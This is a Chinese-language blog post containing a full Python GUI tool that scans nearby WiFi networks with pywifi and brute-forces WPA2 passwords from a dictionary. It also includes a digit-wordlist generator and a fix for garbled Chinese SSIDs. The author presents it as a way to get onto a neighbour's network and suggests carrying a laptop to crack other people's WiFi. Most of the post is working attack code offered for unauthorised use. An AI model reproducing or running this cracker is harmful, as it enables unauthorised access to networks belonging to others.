python实现wifi暴力破解
今天在微信上无意间看到一个公众号的文章,https://mp.weixin.qq.com/s/6fo1Db6BXbm_0lR9vLTfsg
写的是暴力破解wifi,突然回忆起小时候家里没网的时候,天天想着怎么连接邻居家的wifi。当时不会破解,只会使用万能钥匙,但是万能钥匙只是基于数据库共享,想要连接上一个wifi必须有人曾经连接这个热点的时候被万能钥匙记录。虽说字典破解也是很无脑,但是在7,8年前,如果能有个好的字典,爆破成功率还是非常高的。
今天试试用这个脚本弥补儿时的遗憾了😂
脚本
from tkinter import *
from tkinter import ttk
import pywifi
from pywifi import const
import time
import tkinter.messagebox
import itertools
import os
class Wifi_GUI():
def __init__(self, init_window_name):
self.init_window_name = init_window_name
# 密码文件路径
self.get_value = StringVar() # 设置可变内容
# 获取破解wifi账号
self.get_wifi_value = StringVar()
# 获取wifi密码
self.get_wifimm_value = StringVar()
# 抓取网卡接口
self.wifi = pywifi.PyWiFi()
# 抓取第一个无线网卡
self.iface = self.wifi.interfaces()[0]
# 测试链接断开所有链接
self.iface.disconnect()
time.sleep(1) # 休眠1秒
# 测试网卡是否属于断开状态
assert self.iface.status() in \
[const.IFACE_DISCONNECTED, const.IFACE_INACTIVE]
def __str__(self):
# 自动会调用的函数,返回自身的网卡
return '(WIFI:%s,%s)' % (self.wifi, self.iface.name())
# 设置窗口
def set_init_window(self):
self.init_window_name.title("破解WIFI")
self.init_window_name.geometry('+500+200')
labelframe = LabelFrame(width=400, height=300, text="配置") # 框架,以下对象都是对于labelframe中添加的
labelframe.grid(column=0, row=0, padx=10, pady=10)
self.search = Button(labelframe, text="搜索可用WiFi", command=self.scans_wifi_list).grid(column=0, row=0)
self.pojie = Button(labelframe, text="开始破解", command=self.readPassWord).grid(column=1, row=0)
self.label = Label(labelframe, text="密码库文件路径:").grid(column=0, row=1)
self.path = Entry(labelframe, width=12, textvariable=self.get_value).grid(column=1, row=1)
self.file = Button(labelframe, text="生成密码库文件", command=self.creat_pwd).grid(column=2, row=1)
self.wifi_text = Label(labelframe, text="WiFi名称:").grid(column=0, row=2)
self.wifi_input = Entry(labelframe, width=12, textvariable=self.get_wifi_value).grid(column=1, row=2)
self.wifi_mm_text = Label(labelframe, text="WiFi密码:").grid(column=2, row=2)
self.wifi_mm_input = Entry(labelframe, width=10, textvariable=self.get_wifimm_value).grid(column=3, row=2,sticky=W)
self.wifi_labelframe = LabelFrame(text="可用wifi列表")
self.wifi_labelframe.grid(column=0, row=3, columnspan=4, sticky=NSEW)
# 定义树形结构与滚动条
self.wifi_tree = ttk.Treeview(self.wifi_labelframe, show="headings", columns=("a", "b", "c", "d"),)
self.vbar = ttk.Scrollbar(self.wifi_labelframe, orient=VERTICAL, command=self.wifi_tree.yview)
self.wifi_tree.configure(yscrollcommand=self.vbar.set)
# 表格的标题
self.wifi_tree.column("a", width=50, anchor="center")
self.wifi_tree.column("b", width=100, anchor="center")
self.wifi_tree.column("c", width=100, anchor="center")
self.wifi_tree.column("d", width=100, anchor="center")
self.wifi_tree.heading("a", text="WiFiID")
self.wifi_tree.heading("b", text="SSID")
self.wifi_tree.heading("c", text="BSSID")
self.wifi_tree.heading("d", text="signal")
self.wifi_tree.grid(row=4, column=0, sticky=NSEW)
self.wifi_tree.bind("<Double-1>", self.onDBClick)
self.vbar.grid(row=4, column=1, sticky=NS)
self.get_value.set(os.getcwd().replace('\\', '/')+'/password.txt')
# 搜索wifi
def scans_wifi_list(self): # 扫描周围wifi列表
# 开始扫描
print("@@@启动扫描可用wifi...")
self.iface.scan()
time.sleep(15)
# 在若干秒后获取扫描结果
scanres = self.iface.scan_results()
for i in scanres:
print(i.ssid)
# 统计附近被发现的热点数量
nums = len(scanres)
print("数量: %s" % (nums))
# 实际数据
self.show_scans_wifi_list(scanres)
return scanres
# 显示wifi列表
def show_scans_wifi_list(self, scans_res):
for index, wifi_info in enumerate(scans_res):
self.wifi_tree.insert("", 'end', values=(index + 1,wifi_info.ssid, wifi_info.bssid, wifi_info.signal))
def creat_pwd(self):
key = '0123456789' # 密码包含这些字符//.qwertyuiopasdfghjklzxcvbnm
passwords = itertools.product(key, repeat=8)
f = open('password.txt', 'a')
for i in passwords:
f.write("".join(i))
f.write('\n')
f.close()
self.get_value.set(os.getcwd().replace('\\', '/') + '/password.txt')
# Treeview绑定事件
def onDBClick(self, event):
self.sels = event.widget.selection()
self.get_wifi_value.set(self.wifi_tree.item(self.sels, "values")[1])
# 读取密码字典,进行匹配
def readPassWord(self):
self.getFilePath = self.get_value.get()
self.get_wifissid = self.get_wifi_value.get()
pwdfilehander = open(self.getFilePath, "r", errors="ignore")
while True:
try:
self.pwdStr = pwdfilehander.readline()
if not self.pwdStr:
break
self.bool1 = self.connect(self.pwdStr, self.get_wifissid)
if self.bool1:
self.res = "密码正确!wifi名:%s,匹配密码:%s " % (self.get_wifissid, self.pwdStr)
self.get_wifimm_value.set(self.pwdStr)
tkinter.messagebox.showinfo('提示', '破解成功!!!')
print(self.res)
break
else:
self.res = "密码错误!wifi名:%s,匹配密码:%s" % (self.get_wifissid, self.pwdStr)
print(self.res)
time.sleep(3)
except:
continue
def connect(self, pwd_Str, wifi_ssid):
# 创建wifi链接文件
self.profile = pywifi.Profile()
self.profile.ssid = wifi_ssid # wifi名称
self.profile.auth = const.AUTH_ALG_OPEN # 网卡的开放
self.profile.akm.append(const.AKM_TYPE_WPA2PSK) # wifi加密算法
self.profile.cipher = const.CIPHER_TYPE_CCMP # 加密单元
self.profile.key = pwd_Str # 密码
self.iface.remove_all_network_profiles() # 删除所有的wifi文件
self.tmp_profile = self.iface.add_network_profile(self.profile) # 设定新的链接文件
self.iface.connect(self.tmp_profile) # 链接
time.sleep(5)
if self.iface.status() == const.IFACE_CONNECTED: # 判断是否连接上
isOK = True
else:
isOK = False
self.iface.disconnect() # 断开
time.sleep(1)
# 检查断开状态
assert self.iface.status() in \
[const.IFACE_DISCONNECTED, const.IFACE_INACTIVE]
return isOK
if __name__ == "__main__":
init_window = Tk()
ui = Wifi_GUI(init_window)
print(ui)
ui.set_init_window()
init_window.mainloop()
这个脚本确实不错,很简洁实用。就是利用pywifi的模块获取网卡,然后读取能够访问的wifi
之后的攻击就是对着wifi一顿输出,读取字典password.txt的密码一个一个试。
切换字典
原本脚本里是用到自动创建密码文件,内容是9位所有数字组合
这个字典的效率有点低,我还是选择自己收集的wifi字典了
解决中文乱码问题
这里的问题在原文我也看见了,就是在显示wifi名称的时候
可以看到一些名称是乱码,开始我尝试了编码,str类型转化但是怎么都转化不成中文。并且直接print打印也是乱码
我就想问题应该在模块里,先追随到
发现这里没啥问题,下面的迭代只是设置报错,只能再往前找了
定位到了
这里才看到端倪,
ssid = ''
for j in range(networks[i].dot11Ssid.uSSIDLength):
if networks[i].dot11Ssid.ucSSID != b'':
ssid += "%c" % networks[i].dot11Ssid.ucSSID[j]
这段代码的主要目的是从一个名为networks的列表中提取WiFi网络的SSID,并将它们拼接成一个字符串。它特别处理了SSID的长度和每个字符,以确保能够正确地提取和拼接SSID。它的本意逐个字符处理可以确保每个字符都被正确解释和转换,从而避免潜在的编码问题。但是这里却不如直接编码转化
将原本写法注释加上
utf8_string = str(networks[i].dot11Ssid.ucSSID, 'utf-8')
再次执行就会发现没有乱码了
破解效果
以后走哪带电脑可以试试破解别人的wifi
但是这个速度我感觉还是比较慢,爆破一个都得好几分钟😢
浙公网安备 33010602011771号